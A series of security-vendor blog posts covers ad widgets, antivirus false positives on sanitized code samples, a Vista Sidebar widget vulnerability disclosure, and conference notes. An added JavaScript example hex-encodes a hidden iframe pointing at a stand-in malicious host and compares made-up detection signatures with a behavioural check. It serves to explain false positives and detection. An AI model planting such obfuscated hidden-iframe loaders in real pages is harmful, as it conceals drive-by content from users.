Widgets+Advertisements=?

Coincidence or sheer luck, but I just happened to stumble upon this article announcing that Google has come up with a widget that serves advertisements. Quoting the source: “A variety of web technologies can be used to create the ad, including Flash and HTML to author it, and RSS, images, video, and audio among other media types to provide the content”.

As we have been covering these two “problematic” areas from the security standpoint (advertisements as a vector for distributing malicious code, and the insecurity of widgets and gadgets), I truly hope that this new mashup (Web 2.0 or not) will hold its own in terms of security. In any case, like anything Google does, this should be cool.

Hitting the nail on the head

When we here at the MCRC publish our quarterly trends reports (http://www.finjan.com/Content.aspx?id=827), we always face the possibility that what we have been working on, and predicting would become the next issue in web security, isn’t really going to happen.

Fortunately, we keep getting great feedback from the community since we started the publication, and we were able to correctly predict and analyze, well in advance, every major trend in the field: dynamic code obfuscation, advertising as an attack vector, affiliation networks for distributing code, crimeware toolkits, evasive techniques in malicious code writing, the latest crimeware Trojans, and widget and gadget insecurity.

We were always able to step back and watch what we had been analyzing over the previous couple of months become the new pet peeve of the web security community and its surrounding media coverage. So once again, thank you Symantec, IBM and everyone else who has acknowledged our latest research, and we’ll be looking forward to the next quarter…

The perils of running a security blog

This is a bit off the beaten path of this blog’s usual in-depth, hardcore security posts. I was going through some of the support-related emails that have some relevance to the areas I’m responsible for, and found a pretty interesting correspondence between an avid blog reader (for privacy I’m not going to mention his/her name) and one of our support personnel. The thing that caught my attention was a very alarming subject line: “What are you trying to do – infect me with a Trojan?”.

Obviously, with an opening such as that, I immediately went on to read the entire thread, and it seems that our blog posts are being flagged by some anti-virus engines as malicious!

Knowing first-hand that we don’t have any malicious code on our blog (I personally approve every post, and when needed “censor” the code to make sure that script kiddies won’t have too easy a job), I tested some of the posts against virustotal.com for reference (not as a benchmark, of course, just out of curiosity). The VirusTotal results below show the three offending engines that marked us as malicious.

[Screenshot perils001: VirusTotal results showing the three engines that flagged the blog post]

Now for the nitty-gritty details:

  1. The code we post on the blog is in a presentational context: it appears as text on the page, not inside a script element or any other construct that would turn it into active scripting code. It just can’t run…
  2. The code is always sanitized. The malicious parts are cut out in a way that makes them unusable for any malicious purpose. Sometimes, though, the surrounding code is left intact. This surrounding code may happen to be a de-obfuscation function, an AJAX request routine, etc. Such code is not malicious in any shape or form, and is used extensively on the web for perfectly benign purposes. In the screenshot below, note all the areas that were “sanitized” by us…

[Screenshot perils002: the posted code sample, with the sanitized areas marked]

Conclusions: Signature-based security measures may have been adequate a few years ago (say six or seven), but modern malicious code is a bit more sophisticated, and a much better solution is required: one that can actually “understand” what the code really tries to do and make a decision based on that, rather than on how the code looks. (It sounds a little like good ol’ prejudice… move on with the times; this is the modern era, where you can’t judge a person by looks/gender/race/etc.)
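As an added example (not code from this blog post, and not Finjan’s own detection logic), the following JavaScript reproduces the false-positive scenario described above. It builds a constructed hex-decoder wrapper in two forms, the sanitized form a post like this would show and the same wrapper carrying a live payload, then runs both through a hypothetical pattern-matching scanner and through a simple behavioural check that records what `document.write()` actually receives. The signature names, the regex patterns and the `malware.example` hostname are all made up for the illustration.

```javascript
'use strict';
// Added example, not code from the original blog post. It shows why a
// byte-pattern signature fires on the benign de-obfuscation wrapper that
// survives sanitization, while a check that looks at what the code actually
// produces does not.

// Hex-encode a string, two digits per character (used only to build the
// constructed "live" sample below).
function toHex(str) {
  return Array.from(str, ch => ch.charCodeAt(0).toString(16).padStart(2, '0')).join('');
}

// A typical decoder wrapper as seen in obfuscated pages: a hex decoder plus a
// document.write() of the decoded result. The payload literal is filled in
// per sample.
function wrapper(payloadLiteral) {
  return [
    "function d(s){var r='';for(var i=0;i<s.length;i+=2){",
    "r+=String.fromCharCode(parseInt(s.substr(i,2),16));}return r;}",
    `document.write(d('${payloadLiteral}'));`,
  ].join('\n');
}

// Constructed sample 1: the sanitized form a blog post would show. The encoded
// payload has been cut out and replaced with a placeholder, so nothing
// meaningful can ever be decoded from it.
const SANITIZED_SNIPPET = wrapper('[payload removed]');

// Constructed sample 2: the same wrapper carrying a real payload (a hidden
// iframe pointing at a made-up hostname under the reserved .example TLD).
const LIVE_SNIPPET = wrapper(
  toHex('<iframe src="http://malware.example/x" width=1 height=1></iframe>')
);

// Hypothetical signatures in the style of a pattern-matching scanner: they
// key on how the decoder *looks*, not on what it decodes.
const SIGNATURES = [
  { name: 'JS/HexDecoder.gen', re: /String\.fromCharCode\(parseInt\(.*?,\s*16\)\)/ },
  { name: 'JS/ObfWrite.gen',   re: /document\.write\(\s*[A-Za-z_$][\w$]*\(/ },
];

function signatureScan(src) {
  return SIGNATURES.filter(sig => sig.re.test(src)).map(sig => sig.name);
}

// Behavioural check: run the sample with a stubbed `document` that records
// what document.write() receives, then inspect the *decoded output* for
// active content. `new Function` is acceptable here only because the samples
// are constructed and trusted; a real analyser must run untrusted code in an
// isolated sandbox with a time limit.
const ACTIVE_CONTENT = /<\s*(script|iframe|object|embed|applet)\b/i;

function behaviouralScan(src) {
  const written = [];
  const fakeDocument = { write: s => written.push(String(s)) };
  try {
    new Function('document', src)(fakeDocument);
  } catch (err) {
    // A sample that throws never reached document.write(); report it as
    // inert but keep the error so an analyst can see why.
    return { malicious: false, output: written, error: String(err) };
  }
  const malicious = written.some(chunk => ACTIVE_CONTENT.test(chunk));
  return { malicious, output: written, error: null };
}

// Side-by-side verdicts for both samples.
function compare() {
  return {
    sanitized: {
      signatures: signatureScan(SANITIZED_SNIPPET),
      behavioural: behaviouralScan(SANITIZED_SNIPPET).malicious,
    },
    live: {
      signatures: signatureScan(LIVE_SNIPPET),
      behavioural: behaviouralScan(LIVE_SNIPPET).malicious,
    },
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(compare(), null, 2));
}
```

Run it with `node` and both signatures fire on both samples, which is exactly the effect described above: the decoder is the same bytes whether or not the payload is there. The behavioural check flags only the live sample, because the sanitized one decodes to nothing but control characters. The caveat is in the code comments: `new Function` is not a sandbox, so an analyser doing this for real has to isolate the execution and bound its running time.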

Now I want someone to tell me that this is not a false positive…

Really – be safe out there!

Vista Sidebar Vulnerability

Or how a contact may get too close for comfort… It’s finally here. It is August 14th, and we are finally at liberty to talk about the vulnerability in the Vista Sidebar Contacts widget.

As you may or may not know, when we presented “The Inherent Insecurity of Widgets and Gadgets” a few days ago at DefCon, we were unable to show the vulnerable Vista widget (5 out of 6 demos is pretty good though…), and presented a “censored” video as a teaser instead. The reason was that the security bulletin from Microsoft was only scheduled for the 14th (after several delays, starting from an initial update scheduled for April…).

Interestingly enough, the severity as noted in the MS Security Bulletin is only “Important” rather than the “Critical” that remote code execution usually means (maybe because the fix is just a one-liner?).

Either way, it’s out there, and we are proud to be helpful to the security community by providing alerts so that vendors can fix problems that affect security on the internet. Below you can see the full, uncensored video that shows how simple it is to get full remote code execution with these things.

Post BlackHat, pre DefCon

So it’s been a really hectic couple of days here in Vegas. We are here (myself and two members of the MCRC, Aviv and Amir), running between presentations and handling booth/media traffic.

The really interesting trend here is the amount of research that touched web security (in the sense that we at Finjan are focused on): from Kaminsky, who talked about the browser being the attack vector to get to the core of the intranet, through the research from SPI (kudos Billy), CaffeineMonkey from the guys at SecureWorks, and so on and so forth (sorry if I left anyone out; I’m still working across three different time zones and keeping up with the “schedule” here…).

This means a great deal to us and gives us a huge boost in terms of putting in more research effort and working with our colleagues from other vendors.

In this optimistic tone, we are now facing DefCon. Be sure to catch our presentation on Sunday; this stuff is really hot…